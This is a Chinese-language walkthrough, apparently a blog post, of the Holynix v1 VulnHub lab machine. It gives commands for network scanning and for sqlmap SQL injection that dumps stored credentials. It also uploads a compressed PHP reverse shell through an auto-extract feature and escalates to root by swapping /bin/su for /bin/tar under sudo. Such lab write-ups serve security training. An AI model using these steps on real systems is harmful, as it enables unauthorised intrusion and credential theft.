靶机下载地址:Holynix: v1 ~ VulnHub
1. 主机发现+端口扫描+操作系统等信息收集
确认物理地址
ip扫描
arp-scan-l
端口扫描
nmap 192.168.134.155
访问80端口
192.168.134.155:80
发现登录页面
抓包
sqlmap检测
python3 sqlmap.py -u http://192.168.134.155/index.php?page=login.php --forms --data="username=etenenbaum" --dbs --batch
存在sql注入 查找用户名密码
python3 sqlmap.py -u http://192.168.134.155/index.php?page=login.php --forms --data="username=etenenbaum" -D creds --tables --dump --batch
使用第一个用户名密码
发现用不了 使用第二个
来到用户目录下
上传成功!但是未能成功解析
我们想起来了上面勾选的那个自动解压按钮,利用kali自带的webshell并将其压缩
find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
tar -czf php.tar.gz php-reverse-shell.php然后选中自动解压选项,上传
发现成功自动解压,然后利用kali开启监听
tar czf shell.tar.gz php-reverse-shell.php 反弹成功
3.提权
sudo -l
利用三方网站
https://gtfobins.github.io/
我们这里选择使用mv提权
sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar
最后提权成功 root
标签:bin,reverse,tar,--,Holynix,打靶,192.168,v1,php From: https://blog.csdn.net/2201_75569982/article/details/142217934